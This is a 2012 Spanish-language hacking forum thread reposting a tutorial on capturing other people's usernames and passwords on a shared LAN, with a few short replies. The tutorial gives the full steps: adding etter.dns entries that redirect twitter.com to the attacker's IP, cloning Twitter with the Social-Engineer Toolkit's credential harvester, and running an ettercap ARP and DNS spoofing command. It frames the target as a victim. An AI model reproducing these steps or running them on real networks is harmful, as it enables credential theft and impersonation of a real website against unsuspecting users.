Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

Olfateando Passwords con Ettercap

  • 3 Respuestas
  • 4384 Vistas

0 Usuarios y 2 Visitantes están viendo este tema.

Desconectado REC

  • *
  • Underc0der
  • Mensajes: 122
  • Actividad:
    0%
  • Reputación 0
  • o.O!
    • Ver Perfil
    • Email
« en: Mayo 25, 2012, 03:04:58 pm »

Olfateando Passwords con Ettercap por Intruder-T23

Introducción:
Este tipo de ataque consiste en envenenar el DNS de una red LAN. Cuando alguien de la intranet entra en algún website (en su navegador la víctima coloca la página web exactamente como es, por ejemplo, este coloca "www.twitter.com") e introduce su nombre de usuario y password, esta información llega a la computadora del atacante, quien se encuentra olfateando la red.

Datos Basicos:
Distro: Backtrack 5
Herramientas: Ettercap y SET (Social-Engineer Toolkit).
Tipo de Ataque: Olfateo y Envenenamiento de DNS (DNS Poisoning).
Resultados Obtenidos: Nombre de usuario y password.

Configurando etter:
En la terminal, se teclean los siguientes comandos:

Citar
A. ifconfig
B. locate etter.dns
C. nano /usr/local/share/ettercap/etter.dns


Descripción de comandos:
A. Se teclea "ifconfig" para ver la dirección IP local de la computadora atacante, la cual es 192.168.1.104. También se ve la interfaz de la tarjeta wireless, la cual es wlan0.
B. Se teclea "locate etter.dns" para localizar el directorio del archivo etter.dns.
C. Se usa el comando "nano" mas el directorio del archivo etter.dns para así poder editarlo.

Archivo Etter.dns:
Aquí se añaden las siguientes líneas:
Citar
twitter.com       A 192.168.1.104
*.twitter.com     A 192.168.1.104
www.twitter.com   A 192.168.1.104
 

Twitter.com es el website donde la víctima introducirá su nombre de usuario y password. Como pueden ver, también hay que introducir la dirección IP de la PC atacante. Una vez que se llenan los datos, para guardar los cambios se debe teclear lo siguiente: "control+x" (Ctrl más la tecla x), luego se teclea "y", y finalmente "enter".

Social-Engineer Toolkit (SET):

Después de realizar los cambios en el archivo etter.dns, se teclea el símbolo del dragón para ir a: Backtrack>>Explotation Tools>>Social Engineering Tools>>set

Dentro de SET, se teclea:
1) Social Engineering Attacks
2) Website Attack Vectors
3) Credential Harvester Attack Method
2) Site Cloner

Dentro de SET, se coloca el website y queda de la siguiente forma:

Citar
Enter the url to clone: www.twitter.com

Y se teclea la tecla enter para dejar el website falso corriendo en el puerto 80...

Ettercap:
En la consola, se teclea:

Citar
ettercap -T -q -l wlan0 -P dns_spoof -M arp // //

Finalmente, cuando la víctima entra a la página web e introduce su nombre de usuario y password, la información llega a la computadora del atacante. En el video, el nombre de usuario es "internaut" y el password es "password123".

Descarga del Video Tutorial de buena calidad:

http://www.filefactory.com/file/2577oxhg4ay7/n/ettercap_MP4_by_Intruder-T23.mp4

Mala calidad :(








Fuente : http://foro.el-hacker.com/f60/video-olfateando-passwords-con-ettercap-por-intruder-t23-340827/


sa sa sa ludos  ;D
« Última modificación: Agosto 08, 2014, 09:18:59 pm por Expermicid »

Desconectado xc0d3

  • *
  • Underc0der
  • Mensajes: 37
  • Actividad:
    0%
  • Reputación 0
  • root@xc0d3[#] ~Done
    • Ver Perfil
    • Email
« Respuesta #1 en: Mayo 26, 2012, 02:23:41 pm »
aun sirve el dns spoof?
Tengo una pregunta que a veces me tortura "estoy loco yo o los locos son los demás”

Desconectado REC

  • *
  • Underc0der
  • Mensajes: 122
  • Actividad:
    0%
  • Reputación 0
  • o.O!
    • Ver Perfil
    • Email
« Respuesta #2 en: Mayo 26, 2012, 05:47:46 pm »
Citar
aun sirve el dns spoof?

Hola, pues el vídeo fue lanzado resien el 15/05/2012  con el post .  (aunque bro seria divertido si lo intentases y nos cuentes como te fue )  salu2

Desconectado xc0d3

  • *
  • Underc0der
  • Mensajes: 37
  • Actividad:
    0%
  • Reputación 0
  • root@xc0d3[#] ~Done
    • Ver Perfil
    • Email
« Respuesta #3 en: Mayo 27, 2012, 12:28:35 pm »
m claro lo intente pero no funciona no pasa nada en el ethercap me sale que esta redirecionando pero entreo al navegador y no pasa nada xD"
Tengo una pregunta que a veces me tortura "estoy loco yo o los locos son los demás”

 

¿Te gustó el post? COMPARTILO!



MITM / Man in the middle - Ettercap + MITMF + Beef Exploiting + Metasploit

Iniciado por BrowserNet

Respuestas: 8
Vistas: 6441
Último mensaje Abril 05, 2017, 01:37:02 am
por puntoCL
Intercepter-NG una herramienta completisima de Sniffer y bruteforcing Passwords

Iniciado por Rootkit_Pentester

Respuestas: 13
Vistas: 5744
Último mensaje Enero 13, 2019, 07:10:09 pm
por cristobal92
Tutorial Ettercap + etterfilter by k43l

Iniciado por k43l

Respuestas: 4
Vistas: 3427
Último mensaje Octubre 28, 2011, 02:31:40 pm
por Shama|TwoH
Captura de imagenes en una LAN con ettercap y Drifnet

Iniciado por k43l

Respuestas: 3
Vistas: 4725
Último mensaje Noviembre 18, 2012, 02:00:42 pm
por ssw_1
Tutorial Ettercap + etterfilter by k43l

Iniciado por Stiuvert

Respuestas: 0
Vistas: 2018
Último mensaje Marzo 30, 2012, 07:38:30 am
por Stiuvert